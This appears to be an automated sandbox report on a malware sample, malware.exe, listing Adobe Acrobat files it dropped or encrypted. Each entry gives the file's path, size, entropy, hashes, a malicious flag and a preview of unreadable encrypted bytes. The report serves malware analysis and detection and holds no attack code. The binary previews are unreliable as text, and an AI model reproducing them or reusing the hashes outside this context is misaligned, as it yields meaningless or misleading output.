                        Preview:..?:.Q.h...Ph{.s.SP.>.7..\Y.>|.`%..@...spZ...O.0$0......]..o..Z....$......]..8@`}.}F.'"P..o.0.7W.H.$`.....w>y.......~.Gh...\ ..``.q p..e..8....:9!.G....]......7.....=.'#\-.?.n!+.?....(..B..J.+.IN..'......$..\.....q.M....*.!...\.-....tV\..O...0R.]*a.%W...X.....!..}./..*w.CX".#...g'...*O....h...H.#R..X3}]].8M........v.5..9.........VI|..D....[..~...R^.........s..8.);..-.!.d'793.#y...y...."&...p...{..\.@.$.`..wS.z5..j..+....?...Xt-.J.."s.n>{.G.....". !+...0..|...!F.kI&.7....h...d..n.tg...aO1r<(..).sU..%.....^....\.H.g8|u.FD..~..t'..I.b="....'....Y.m.W+.....T.......@"ppS..O..z......?....'.*~J. ...Q.*.f..Q...V..P.BE..;.A...lLv...-.N.B.j.F.....h.....d[.D._#..7o........u.8?.....M..../>.f......z../`.Q.<Z{v.H..v5(..7D..Z[.u\..m..W...^.f..c.....7....D....M.0......I_x....W.P..u.w$1y.}q....r..;.0....Q^,jCb...'....]e....?.a..;.^.>4..T....e...Z...Gu......h....>....B...L..m[.0eI..\........Z.a....R..q..y1}..K_fs...q....6..E.-.U..K.._.E..mQ..B.......A.N..C

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):341062
                        Entropy (8bit):7.997602114795227
                        Encrypted:true
                        SSDEEP:6144:aiaG80gOQOYxXMrktWo2+asMyii3rRWQsq2I0bEAQA9Z3cS5ggCyR:58r5ONr1/yjtNsq2Tb7n/dTR
                        MD5:7E7F706F5BE8B31E1A3F3BB6EC24B5C1
                        SHA1:2AC17F9FC00C9E2AF2043C12DBF1ABA06F158252
                        SHA-256:E434DE2BDE3E28DCE5A2B8F363B83331D2671EFCCB8ACC7C269F944C85D43E27
                        SHA-512:2DF7C29825164B40506B7EC6A5F83A6F58074BF387762ABF0C5C3FF6419E6961EE76C0DE0A5C56AF622A938995AFA860B9745112375A2DF9E7422F6C43147D23
                        Malicious:true
                        Preview:g...R..w....MQ...(Ct.7T.[..{..$Az..p.;!...l.>.........y.....p..`.A...q...OX.Fw..U.W..)..*......$...V.........rn?.tY5C...+MR0X2*.t..pr..J...A....m!..Q..w..'.C.0.R..+H..b.].........S16...z.?.sOB0....<..d.+ig.=...*bj....../.....D.c.R..O..R...t..`....@.....:B.3x...u.u.9l.&@...H.....@.(..G..........*..f.-.g.a.b.....)..D...L>..>.`.s.9`.o.=c.....O`.........l.....2..D).....(......vE.2...Y..e .5.{.u9.A.H.85.......o.......#A..R..o.$2.._.P.-Ek..Fs..6S]...:. ..)......6L..N.h[C4....3n$.........$.,.......E~($....|...B.F.>..i<.5....g7.!.L@$...P...uyy...s.Q..e......x.m..~L...>.....7.El.!B.=....[.}.....M......Z.s#.M\.o........X..4...?....]... .?...I..8U..w.......e3.>#..t.2...(...c.P.d...p5|j..d.8)G.]I.......+.f)*.+|..Wbhqt.Q.7..=.;... .3.....t..i5.^...=..B5B..QG.]81Ku..R....$.f....?..Gb..o...A.....#".-....o.J-7. ..5.@,{..3 .o.?.DZ.f..r.H..BB.W.g...d.E.(N.. ..w.N&,....e3.[A.3.OdfY.....I.[...VWL.K.UPM.i..?.^F.8.9T..T..(.........;..S.jP~QB..m..-.f..<.T>..1....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\resources.pak

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):7420968
                        Entropy (8bit):7.998542841580671
                        Encrypted:true
                        SSDEEP:196608:wcWSxgJzkK7XzLA1ILgY8j4b1rDcZezSSiqP:wNlzkKzzMBYI4JrDcQGS3
                        MD5:6AAE3D4C6975AC249BA7BABDC7717EA4
                        SHA1:F97384DC68511CEB20A2936C9CC85B92A30F856B
                        SHA-256:EA9A3001D4913CF73FF76DC10E391133818CC892A85AEE12B17822CD16D06434
                        SHA-512:0203CADEEDC4D6598C80D988036F298D65E261520CACD41B87F1F0F1872C8862815C65FEDE8DAFD6CA5F761A5F376F69721B0211CB46508C18EC685C8B358659
                        Malicious:true
                        Preview:[ ...]C.$G.....yR....1...q.^.)....z.}...$/T.g...&.....4.F...."....s&.U...v..K.o1"......pF.U..!B+.H;^Sa._....... I.....IqP..H..c.p.).....`.....x.jp2M9...0...{..F..D\d.......\.......qf6..`5...x.lK.k..Y....QYxW'.K.......'(;.,N.q...}...Ox.bJ.C.z..)......_..UY...j..Ur|w...Bit.LM..qo..o..C..'.V..@tL..@...7?.W.8.k.m.=?5K.....$.j..[K.m.@>.i.0.s.X......B..@.&{t..^.~.D<...`...T.%*.......s(*...v'oT...E..%....-(`..Y...b..X\..Li..D.n.../W..q.R..1.<0.o..._"w....%.."..[tyv..Q...9..}EZ.<....lL....)q.O../.......!W>z..X.1.........d..*...v-....qp}E......[!.M.......F..f{3....2D"....vf..RW._2../.U"K.:nV!....;.%H|..*.../\.e#.q...G...>...c. .: ..r...p....Qe....bo.^.Q-$......DzN...T.g....g.)......"re..[..S.g.L...*.oU....+.Eu.+......S...:.o....).#.Rj...38...=......g...#E.&...}.8..9.. .x....g.HD.b..$.......?.S.k..#.g`.b..%B....>%&.e..0}..?nfd.gs..L/U.5.b...(..s.#..z.h.{..Y.,.........w.....1..w.....x.I..w......S.Q..%.9.....=%wi.U%......H.:.....?r.....a.)

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\ownership-hero-image-d.gif

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):246691
                        Entropy (8bit):7.999093257197509
                        Encrypted:true
                        SSDEEP:6144:I92LMQgl5AB2It+0GvB77eiNfIx4FWw9I9oZZqomHJwOQ:IcLMQgnA7Dq/NgKFXIeEBQ
                        MD5:DE5136188AA6293895E045EFDAAB7A88
                        SHA1:3AE6EE81D26E6A6FAE2CE476460B1DC068886A49
                        SHA-256:BF32905B7592A8462F210C749D8DF9819451C1D437B6368BFBD606425A00E2A3
                        SHA-512:192BDB32A659AB34D7716D26178A0A4702725567A02950511062D7BF7E5240527F4665069CD238C4C53AE95A9B69F340F2A77849814F932462807A9CEF5C6215
                        Malicious:true
                        Preview:.~.>..[G.7!.....:h2y..d.0.q._.i..S.....-...........}+(...f..E.b..d...;... ..ns..Vd.S..XtQ=.(...}...S.....fk3l+...54'.../..FY...S.....O"....k...(...Z.'>.J../RQY.......\>?...v.!...8..fOo......k...H..!5..5.'.[b..q..'.L...M?y......X..^.C.w......(.)8](.u{.k0w..@-.~.N.....+.......F..4.L....[......(.2.1...L.?..Uu.p.Z...nfCp..P....j=.K].7....U*.......:@.4....W....R?......e..W.4..$.f.KMj.....t.D....3w.'#.H.;.....c.9.8..m.g.*......_.|anCb....s.>...8].!.1.J....BV..tGP..Tb;h.=.]y.....J..B.4.w.Ah.}x.....s....;.....f.......:....K....:...)..@.V....>......Q...A...]....n-.........t.=.mWrCpl....._..U..1..Lp..dn...M.r...7..;.. ..(..........+.;..,...O.....9v..GK;.ldf8.z.....B.w..Y.Yr./...;..K...+>.|d./2...+.]u3w.W.gN.c$....i.......8.B.O:...Ub."....X.3..n.'2. S.YoPM/m..;6...i.......3.D}...:....1?B|..... w>..{.....+W%.tu.........-.p7...,..t.*Y..#P6..u...MJ.H..N`.Q.N,Uo...2....Iop.RR.........5.^.>..P...l..y...gd...G..L.Eb6.gr......M.H.:._-....H..r..=.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Click on 'Change' to select default PDF handler.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):186945
                        Entropy (8bit):7.99891997797865
                        Encrypted:true
                        SSDEEP:3072:Us5aK+Yt9fX4TamLnnktFcbPxSNW/uDR0l1W0MPFFsTtx3Xc7Fb1oVVVF3ZE8c8p:UsvhHjmzktFcbPxgO4Q4fnGt1XYCVVVh
                        MD5:69AB4B81646DB7CBABF2CABF4FB90490
                        SHA1:5304FBB7272C848E847FF0E2A89B8B67A025720B
                        SHA-256:317C196C5843EEAEB2823455A6043EC498F36A48A95B559EDE971BAEF3BC420F
                        SHA-512:B0B0A0F5C270E7F90C6A0952C1DDE625DF01194536354E634937E0CF8289AB98D71657143108E8F4F7831BF691EADB8C3A1B6FB40D9E06935E2985F8E90D338E
                        Malicious:true
                        Preview:.......3?..:.8.F....$PO..'q....DE...g....#....T^.e!.5..... ..v..ZX.,\xWYH.h...TG....$~(J)...Z.6q..d...B.v.jZDh@.N..^...g.M..#..O(.O.h...2.M.v..6...W.+_..R...3q.k:.2)..I..T...T...h..s...F.w.gc..........(j/.-R...=5......'<.T......Yj..~.P?.&T.JC.O..h.{f.t.D..Fxu...(....0,..[.z....o.U...N.......H.sJ..{...............T.....z......A...GV.C!...R..FG-..2.b...1.&..y..d..v.i.q1.S..o-~U...,.3........4\u...A..-..=.GI.S5.._..TD@../.....Y<V}.z..p>........^I.......9...s..>......3.{.\..I...."'..*t..y.~.y...$1...\}%.....2..._..~G.:.O...&..N..e...Xg%...v........e.....D..|...W.......d....3./e.5Y.YT:.....srQFN....i....d..V..-....t....o...Eac..`3r.....6?>%..y..r6B...l.K.Z.\..d.u.._D...G...v...8.|AQ|R.%JY.....D.zi.3y.>....E..!;...:...(.|h.......S.%...vQ.z&1.<.A....|.]...^V....c.`...2.Q,......W.Uj..h.q......Os....0?.......b....;...2..=)..>.C...r..*.W,.6z..^........OG....q..s.t..A{..!b'.y6/....j-.5....`... R.7uP.........+7..L..7.F@.l..p.6.Gc..8^..}...%.{. .a..4..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template1.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):15854
                        Entropy (8bit):7.988733557086937
                        Encrypted:false
                        SSDEEP:384:71LRoZKv9fnqWPmFYfqOkwI/HaiuGpZxRa71t9a98JS:RLg4BNmqfqZ/6iuGpZx29r4
                        MD5:9F8E761C2EDEB06ACF73829E127BB0A9
                        SHA1:B8CB86762B1CC113AB20167C599E1DA8843EDB92
                        SHA-256:90E40B3B53096123D51364252DD749154365CEDCA9B6257B723D9FFF4C6EAEAB
                        SHA-512:CEA87F4FD6A1B319F1C3B1FF09E0B93000724C48FE10C5C621B4B0D586EB094E446831B97DCBE7A8500931FC3965C95412679DF103E9E2108C2400F30050616E
                        Malicious:false
                        Preview:....2....W.Y..U%.;.6......vJ.o..Rq..Z~.s[L.......t.B.....'.Y....$.....ha..R[.%7./.r......<@..5n..^..}W..\..].B}>2"....V.G.p...... .}..z.N9C..`.b0H.j....W....s....n..V>V;....m..g..i.+...).-..m.O#=.nB......Zx.b!.......Yom^.'..x..z._..y..H......".WK|..KC.^@.X.:..&...NK8..P.'.(.t.#......t..g....B..'.TQ.t..m^.7..T.><.%..X.'g.C....z.(.<..3.~^.........Y.8.K.../NQ.t.J!&9N;..S....Nn..\qb..../.:..QGPx]Wk....;w.I.l... .!.6.':llM..P...{..Vn.o([P.W!..s....{<....yeWY..=..DK.r>Z..s.C..G..y.y.Q.....d%....m"$ ....h.|@.Cm......5..+*\@?U+.....k.l.\...5.Z..g..w..H..>....2.......'..2. .=...?..o% .R-|.......O..7..b!+.....f..._5...w.R..P+....}t....;..\h..t..N.....9...Q......W..E...]P.....wg)".Q..g...g..IQcr..ENN_.....(T..|..Z...O..F.5.\......Q...Hr...i./..?_A...P.u.=p.?wta@.S.7.o.~d5......@".GI..6u.C.9.....~.EM....s..C.....#e.....).VS.G^...f.(OU....l.1.C..{...~.....*.Je.R....m./.J.0....IkV.O.!....Z..2...D.T...,...<brj"..F...L.T.=+.[rt1S.m(.bb;1...k. g..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template2.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):29519
                        Entropy (8bit):7.99362124224976
                        Encrypted:true
                        SSDEEP:768:rZJYYGEAMay0QTJMxB+v6RvA5dbrUQLpZLFL:VJYYNhTrTJQB+v6RvArbrLLFL
                        MD5:D232A473F8C1DFD81667E7DB934224BB
                        SHA1:941F2AF6FC40BC4A4E3DA780A8638B128C7D4E21
                        SHA-256:666C95B207403B1B55FE76D1373FD62740AD6831B6A922A7538BAFF4CD384D9C
                        SHA-512:FB19CB6C9D14C62A87986ED42F6863A046E08F76BC87E7E1AB03EE44B206E0E61A0057E31EFACE907AF3C2C6A8386B11648FFB81AD623DEFE0D397A3D575E394
                        Malicious:true
                        Preview:..=.{.\.....W...Q..Q.e>.0~3....$.a.............'..[HG.xK.E/...n,..........s....%.D..p"..e.....%F4....|..b.v.....dF......U.|..0..5...\...8..:%z....d...`.....R.mK5$.ImJ...'>.9.?.p.2B6.(...qz.........Y<-.4K.H..n........Fi.G..z.I[....a>...}.qP....[).p.{9.^L$_.....oA_..$..Y...;.2...~Rv.........~....1BG...l........R.q8.*..J9.L.T.=.y.)..&.....M....g...'o{F.6....F...0......D......0.....y\.:.<......K..3.)E.P...`.yMnS....a..[.q.....fQ..z.......2..E,.\u.L-..JP...w..R.`..f.....<.k2.Y...8...!..<.]......e$.u]....9f+...z.@VK..>xZ...-.(.z8M......1v/..P.$T#[CEo.%...G..:[.S....?.h.A.....Q...v._.g..g......e...6X%{BC.]..}q.~3...Z.h2Hi.........]:.J....69'.ul....M.Z....o....'2'.v.c.......J.YtZ_...$.).Y&^...>...q....].......F....eK.`...._M......R)h.<.b...2Q.rs...`~....vm+...RS...D..G........'a.6u.{JI..f.Rh._.m.}..V,.....4....g.-b..3.....<.......J!&7.:....$...5.]P..L..*.....iZ..w.4..R..r%..!8.X..@._|{.Q....^%e..`<..7..Q-&.....B,....8..r.Dsv..\S.D.nY:..M....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\template3.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):26356
                        Entropy (8bit):7.992453288141889
                        Encrypted:true
                        SSDEEP:768:JomaBz97VyYES5/LtmGHUReg5NGM9Y648Icz0:id9ZyYVxMRV559/6
                        MD5:BDB49B5B47DEFA7171BD1EC67047FACE
                        SHA1:87C868D254C9C929796276F857BE34FB6B6FF255
                        SHA-256:004B7ABB076543EA208B1A5E8005919E1AB89FAE5F88CFC14D3172C047FC594F
                        SHA-512:B473DCE97B0CD4E29C5610401BEDAFA59B24CECA168600BDCB46227B506A4F2AF69AC256E334CD32F84B58838BF97B7397E8912F13C83E66F2E9A728EDA69476
                        Malicious:true
                        Preview:y.......)..i..+....F.\..Z.vk.X.....m,K.}....r!..../../.d.,.,....4......E..zZA<.......1.N-.*p..-.S.......IH.i......x.0YU..W...e...9n...C&....$._..7....%.....L..r.....`y..m.p.D.........[..n........T..G..a...-...=.X...Q.2.GMW......#.W...e....rO.`.3.r..|.Sq;.x....ZU...8..Q..Z_.\4.)...h.i.XnP....(.S.....7"...Ki.4..9..<+gD.j.....+..1.v.$XB....cj.sSsM.j03.w..8C.U:S8mY]<...R...h..~X.U.%.p7E.>...;..L.....0..}.. ...".J.o..Z&....w[..C:W)kM..[;43}2..z`%......I.V6..:2MDZn.H.....L.@.-..J[.9.<......7qU.t2!! ...Q....#I...........g-M|..p5.....TNHoO........C..0......2...A..")|L..h>.Q..yS:.....o......#.O.r.5..Q.J..#./E....z.b....d.H..hS.k.{..l(.K......]....tE..;b..."3...C..&.>......6'g(%{...0cx.uA.......rq|."....3J.<j..m.0...Sz.a..J.....WY.3M.....Tb#n.;.3('.7., .<...I...h...z.....jOU6PZ.....d..?...J2..UU..].....!.Eq.......[..s.%.j\.%.80.`|..Z1g......<...p.4.4m.8..b.hAb=H..B..-+.[..,<.Ww!.._W}..2...x...7$7.KW$./:GT(.|r>..z..r.....6.....:.cJ...}........O5G

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\template1.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):61478
                        Entropy (8bit):7.997005640130102
                        Encrypted:true
                        SSDEEP:1536:4kcO7CbAA6cCTg85zO4kR+sEUQdkF61NcxaeFP+z8hRNf/IE:V7ubAA6cCZzHk4B1NcASXR6E
                        MD5:3E0842FEE6D2B515D46D44C0C95E15DF
                        SHA1:41B5AFF737138BD5EEB4988AEFEFDDF070D14968
                        SHA-256:F4B7754003D78662C2818390754354D0C30DA0188003818D5353EC52657C75D6
                        SHA-512:E72DD1D434359CE3417FFC3A5F9740F3270A618EEBD79BB4A66904F32B7E6E01F134350F768469907EAA8CAD6CC82F20E92FDC4E758004C78EF93609290B9757
                        Malicious:true
                        Preview:.y.+b$.V6+..T..9.#X.....:..!0...W.:%.FL3.,.0.+u.L-..C.4..".[.QK..wNj....',Skf....}........{.`.l'?..+..x........ySIP.c.F..w..P..^.......J.i.4....;GB.h<3.i9.1...KH....Vo..s...F....;B0..^Z\...f...Z..3.....A..}=f..I..L.I..{F..Spr.]..y%...Ij...........L.nw]x_....U....}<?.V.~....n{.e......Ys.U..t....(i=(0t....Y.z......r..7.:.1.S..r........0.+...'..!us.H...^.61.t.5.~....|.Dl..1.>..b...9...1{.i...4.9..Ar..@.QW..M..L...(.n.2.9p..f..._A..D#....<..z...#...G.b[..n....K..D$..E..uAF.C..B{F....W_.rN......1..B.x-,....K#G._R..=.x*t..{.-....[.......ye{......).<.9....=.r.......K..N.=`.*.0...._...;..O.........w>7..p.........pGs.zR.}[..<...~...-....<.....|.#...:..c....^.o.)4..=....s....`.0...v0w.._...[.%v.)....z...'X.mt..9..pHO..Q...2.B*t...u.h..|..$)o...8..N.... ..qx....f....<.&`.C....(...:3Y.J.'.:.t...x.'i.....#..j.X.?......s...=....m.=.uOu...bc/a..S5z..7...N..nc*.....&..@.I.#;.*i..^..;.....,...@....P....)c..ZB..t$|'.L$. ..h-..FB.R./..@.7.....5...K$..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\AdobeID.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):82178
                        Entropy (8bit):7.99792478155612
                        Encrypted:true
                        SSDEEP:1536:L5oFUwkioO888WZRZE82ZSPpUw2s4Cj4WlWVNzGzs94BKi:No9kF48WZnEYUH0Wanl
                        MD5:927893BDDB50C4CE6E5D93966D2C78A4
                        SHA1:FCA7873F18D529EA7EE492503E9E10C4C5D8B56E
                        SHA-256:7E0CF5309B123F29FF86DD30BC9A771E341BA4CC1AA4DB894BF1A97F1C46E9E1
                        SHA-512:0360C505D8BFDC427E0BC4A7784BBFA9186F62DB84C9C4B23342D09CDE6BCB0F2418E6D27ACA9E83CD302094B254D5E000C13F025E5D1F0926E52B9C3B1BF5D7
                        Malicious:true
                        Preview:...[.0R..r....},.&..q..K."..?`3.;.k[..xu.uHYS..g..i.~.a.......dM.......!....#....]...V..0.P...H..C...K.... ..?..c6..LF...]..m.II.x~B.8?.G.!.z..G...#fi.8....3...n..@S.(}...e....u..).\^.1...0=..J1..Z.,..e...P[X..i..i...r..k..L....JXm+l*.O.-eB.Z1..My.*.z...^)vY..=..........r..:.).kG.0DvV"#....W..../7..G-.Ie1...>iK..'.SB.iy...<$X....z?i.._...F.{...9..9G3...H0L..)5..t.A9.t;pat.....j.....B_}...V..M...0t'.=Df9IP...9!k.QV._....m.].....~G..D1pP..@w.[j..J....^9..G?n.....].z.,@...".rg..M.q......p.:.`.V.}.ry......Y.._.^..<...3."...............O2.....5...M.7..d.g.....<g..,.KB!........h..:x...........+<H..`}I2aW*R:..%.3..4C...}..9..W..e .,.(.......'....b.9.F.$ ......~|.....z*=..J..........a9..A%.S...?..y.M.s..........4.v`.*..\.s{'.6..........K.....+........`E.....x..........._..L+.?%...!..EB66.BkF./.r...f....gw".S.P..^.....P..z.%...^.&...E9Qiq..dQY.D.d<....../.-...8.w.P..(.h...7?F .D^^C..b..I....E....m...|......D...J.WP...d....K....y.........J...1

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\DefaultID.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):80759
                        Entropy (8bit):7.997790208978143
                        Encrypted:true
                        SSDEEP:1536:4gh2GFaUU23NLRbBUsyufezQNWk1LAIKkBRnKIhM3W+RtuIA+d:402cnU23LbBUsrfecgi0IKuZSW+Rt6W
                        MD5:3E64443F1474E3D8896794E99BE0649F
                        SHA1:F82E93C60FCCD6B72F7A7CF19D4C1365F2EB908D
                        SHA-256:DB7FE4F59CFD346E61BF8AD49DD2C927F8267706FCA329462655C6EAE1C86EE0
                        SHA-512:1D5F7ACFBB3F075AD93DFFC58A50F25FC7561382584789FC6792F91543FBDB80FC5A1CE6AA1535FCD7C3ABFA802F8A01E75A98E5016796060C17FAD87FFF1204
                        Malicious:true
                        Preview:....K....)...}{...{%...6.7W..k.0]..-G.{3d. ........u.H........"=..3.G.i[.._.L.f.Z6..9.(..1....5._Q..Y.9.K.`.S..q.C!k.....'.7.vz.......v...XuCn_...k}aN).........Z.1p}.Y..U.Sv..p..I......b.P,..4]{.s.'..i..Dz.P.g!....h.zv......K..d.....mo".-.z...r..q.r..1 ?v.,D.C...!M.....C.d.....X...H...L..M/.}.U\.A...}!.A..].]l-.......,ix1A...7..u .B.~.'{M.&z...X.}.....f..A.w.P.B......\[}.t.....1.?B....=w.F...k.......Q......].{......Q.....G...iT.vw.U.?2....kr,.S..`.kL.....o...M.....&a.o8 ..]..\~C....1.QS..b..._bRg..._..........@.....6....?...x.F`....O.+R..._.v1...;.......'#......k....~N}_.Y..I.R.~...S....3.)#.W.?1.30....\.e..ij.<&-.b..^.!..M...).Z....Y]U..I...F.!...5N.V=......'.c..1-........=...0s..D.'.%!.'i.C.....M...y..3.VI.=p.......s7[K>..e...w...-$Z..............}.p.7a'T.S..I.........@........$....[oR.s..s&.8.._.!..:..C.......-..V...hq.+...\..C... AZ...;...9f...}.g.J...r...6Pv.W..I........0TP.b..rK."..../.....*....;...}{)...".d...ke....S.l..d..r ...7...2...x.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):42924
                        Entropy (8bit):7.995616320651788
                        Encrypted:true
                        SSDEEP:768:jq1UhLNxsgNsU3QxT5Rbo6CHxVVYFVfKiG0YRq3oizSiGqJKJR:j6Uhs0Ad5Rb1CHxUFVfbIq3hK7
                        MD5:7CF1C64ACFC11518266E64EA5A7533E4
                        SHA1:30A35AC7860852CBF07BC2E948184BB33EB3821C
                        SHA-256:B13D60EA7B6EC6CF3F6488BB13408292A3468C34641367149B6BB8B93B5B0B64
                        SHA-512:7B5D27F137F27A47E01BB247C8AE9F4E1F38521237D10AED882E574B64A31D0C62A28FF08F8BBB03EF867074F7C591BC7EA1FB28A5B2D46E23C857B4EF65EC3E
                        Malicious:true
                        Preview:...v..?.f.!{..u.g|...ozU......".zG5.I....w..G...#..#..f6|...{^Q...'....._..F.eg....7SRw...Z...g.Q..(..7..L...IX.................uS.....%....:.;.p.L^..M.._..7.o....-nX..>.}.wr.U.....\.!(...K......0n-.x[m|.%oE..xS:..8.u..-...1m.K....el.....)..O,>..~\uI.u.[..wS7?......N...........^BG.KW."../........d..\IQ.&..C...Y.Y...''...J.'..DK...\...uq.^...^..k.~..i.{......a...PS!.p......2 ......<....8}o._....{t.....q..S..d..y~.<...z...I4#|......7+f....u(..-..,1.V.jE..|-..D.866.z0.G..$9..Y6g..p...F.*'....6b@..../e9...n.Z..!...>..0..[P....5..[^...f.U.uO%.]o.?...k.e..k..!..%.R...=..e~[...j.o.o.u4q.r..jB6TBQ..S..j4..IF!..x..Es..A.I..K.$.z.....L....a.0.."...uP....ki^Jr.l....../(t...$.....".|...s.U..m..z..9..%+.`.V.a......";4...'`..r.>.......h.~..hOd...!..5..v...f.T.l.*`..B.)R2."\u7y..tGx.E.nO.%.Wvp.k.?.)-...>.6......,R.t*.....($z-...T..y.<.....f.'.......j..n....2..(.}N.....7..9P....$......nZE.2...W...I.1V.?....~(..&c_...!.Z_.-Q.f...T..(...%.j.....R].....`.)1....dF

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):42276
                        Entropy (8bit):7.995581789809084
                        Encrypted:true
                        SSDEEP:768:TYPFDb4xHmrI1JVId0af79OCFh4zD6RX8l9n3+Li0uQ18TjnZ0E+IKE0U4HtFHoy:0PFDb14VIie7FhiW8r+UQK6IKE0U4NF/
                        MD5:C8EB84DE3C39E8644E62927F5E2D1C31
                        SHA1:E6C1BAFBD07BCC1BF1787C0F7B13BF4AC04BFC74
                        SHA-256:FC06B67253908A12836469B7A634EC83BF1D88A0EC21A59EBCB9E80165FD6765
                        SHA-512:F0A4CED7A012DEAB20A0D59532D0CD22D70FCDAC845451A9E3618F3E05FB5EA61C5CF01546C4CCF2E3A5B5506158E697CA4CA343F508B61BFF0B8050358082EA
                        Malicious:true
                        Preview:[(.k]..!..(p...WK.....A..y....V ....4....'S.}^Xsy..:W.(i.;...>..._LyT)v.d|...V...~..V...v.-.V..>nZ.9X...A/d.A'...NM....?b..1.,.H..:.'.|..\......u....%m.!N...f..g...}.....b.rO...,P1...V...e6....1,......(....|...clE_.^..A...*...@/>..w..[M..<....2...A......E.].U..X!7.Sp.....).!;,%..veL.Y....[.K9W..............\..W$...7F.X'>.U.....z...W_.]\BI.O'...W..=VDu.+.|..@......z......Z#=.qjK....bz{....2...J+._8...../..8....xa.Z/........L...J.u..x...'..$...;/.......$.x..09W..;..-...y.w...&[....^.@...7...`....S...0..i..O-S......Ra|..}e....:6...I....#......'H..Te;$.$.~...".]\.%&...?..p...._dq]..l...........g.:......Iu .V..FC).vQ....q.......|......?.....S..D...$..ba.*....x.+...&.0'......C[.0...r...Z(..<....]..D...:HQ...3.+.M...L..`..{.t._>^O........t..*..T0_.A.&..Y...T..Q :h...=..L(.e....b.....yV.ry.r.[..A..n...K..CN........JY.|.....\.........c.b....M.H...}.<...l.,......d.$.Rd..-b&....U...=.)........Q...:.K.^...`T.L...ZWq.G-...1.....?f.}.OD.^..kp>=e.6.8.._....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):31296
                        Entropy (8bit):7.993066510163361
                        Encrypted:true
                        SSDEEP:768:PGJs1D4uWXiIJSXA48LnipETKmw3i/X2hLtKzjohgkelk2L:PGy18DSIJJ48LyETKY2hRKefML
                        MD5:E654192CD9844025583C06DD903556A7
                        SHA1:5FD3B6570F68E809F6C99EEAAEF28DE855467285
                        SHA-256:9AA0288D9D037B55EF51ABBAA1DE98F6F07563E4471C59CAAB9E87A3E15B4A3C
                        SHA-512:66339F07877DF8845D6A8233FD8969C1D633D1D70DB90E8393D632B90F72A97A94ABE2765B86F8441F896C239C8C1F4F3F8100744483E88AA09D60CFD02A77BB
                        Malicious:true
                        Preview:....../..-.\.g.U..~...X......:F[.....Hy.]....y=.b%.9B..w.S..z.1.U....9A.._F..o.w..{#.r.3..>.X?b7.HB.q..$>.q..w..Jm......"...\.L..7..K.]..k.W.8.t....6..m.|.........J#.....9.0.....S.'..D......m[d...b].M...%n..C..j......>(.Q....m.p.6.6."...+m[n.,.....".V*.>#=..9 F:Dl...}L...k)-c....I...y.N...)....O.!........_5.C..e...v...)t9.'..a..3.A.....=.q3N.I.....!].\....K]....M..x....w..S... ...;..kF..5.......N..|k...Y..^.T...jN.....3F..:1..Q....9e..$n.<w.so...N.X..1 T.#..|..........}.......),.Q..P........OS.a..Q&>..\&..(.|>F.k...z.mz.j..h..q.. .'<I......*..4.s. x.KO..g.Z$.b....h.....T..H..K.[).u.?..._oeIO....&...t.?....jZ."]U.wRJQ\.........h.4*......S.....q.y...h.....xlh...et.2.{Ol....'`K....T.<.m.6.`...9.].tZU.@d\?.'.{.F=r...UCg...n.D..*.... .......g....h...,u!..Bt.1..;..Nc......z....e"...0O...z..{..#.XQ..j..f.W........H..3J...:4.r.i.....`bJ..!L.d5.Q.....x...)...H".......|Tq..}I..J....R#..2.-.?J........[.%DLo.....^..#.v.k.....y..g.<:..J

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\license.html

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):29581
                        Entropy (8bit):7.993194197601483
                        Encrypted:true
                        SSDEEP:768:Zpk5Ny/n72gqlgRHLTFTLEJB23Ac2HA2Dy9P:Zpk5NGOlErhTLy23Ac2HA0y9P
                        MD5:FBCD1CFEB39133513EB11C98901CC3F4
                        SHA1:08160AF95A060AE4540F9BAC2577BF5871297D32
                        SHA-256:57BE39C19B2B394E1140D75224C31D99EA34AAE730F6FBA3D5FCCA153C2B64C7
                        SHA-512:DD1EEC8D0A0624395EEFAF80FB0B0463AEA5F48DF0126AC84B3F4B166155EDF9BA5F399E51403A3B5959117A4A47BDE32C856FC39DD644F4925527723A4B1FF9
                        Malicious:true
